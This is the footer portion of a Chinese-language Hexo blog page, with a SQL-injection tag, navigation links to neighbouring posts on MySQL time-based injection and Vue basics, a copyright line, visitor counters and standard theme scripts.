          <div class="post-tags">
              <a href="/tags/sql%E6%B3%A8%E5%85%A5/" rel="tag"># sql注入</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/09/19/web%E5%AE%89%E5%85%A8/SQL%E6%B3%A8%E5%85%A5%E7%AF%87/mysql%E5%BB%B6%E8%BF%9F%E6%B3%A8%E5%85%A5/" rel="prev" title="mysql延迟注入">
                  <i class="fa fa-chevron-left"></i> mysql延迟注入
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/09/20/%E5%BC%80%E5%8F%91/%E5%89%8D%E7%AB%AF/vue%E5%9F%BA%E6%9C%AC%E4%BD%BF%E7%94%A8/" rel="next" title="vue基本使用">
                  vue基本使用 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">xf</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
